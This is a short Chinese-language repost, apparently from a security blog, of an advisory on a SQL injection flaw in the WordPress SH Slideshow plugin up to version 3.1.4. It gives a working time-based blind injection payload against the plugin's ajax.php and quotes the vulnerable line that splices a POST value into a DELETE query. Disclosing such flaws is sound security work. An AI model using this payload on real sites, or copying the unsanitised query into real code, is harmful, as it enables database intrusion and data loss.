标题: WordPress SH Slideshow plugin <= 3.1.4 SQL Injection Vulnerability 作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm) 下载地址: http://downloads.wordpress.org/plugin/sh-slideshow.3.1.4.zip 影响版本: 3.1.4 (已测试) --------------- 测试方法 --------------- http://www.badguest.cn /wp-content/plugins/sh-slideshow/ajax.php id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)--%20

---------------

缺陷代码分析

---------------

$result = $wpdb->query('delete from sh_slides where id = '.$_POST['id']);

转载请注明来自WebShell'S Blog,本文地址:https://www.webshell.cc/1077.html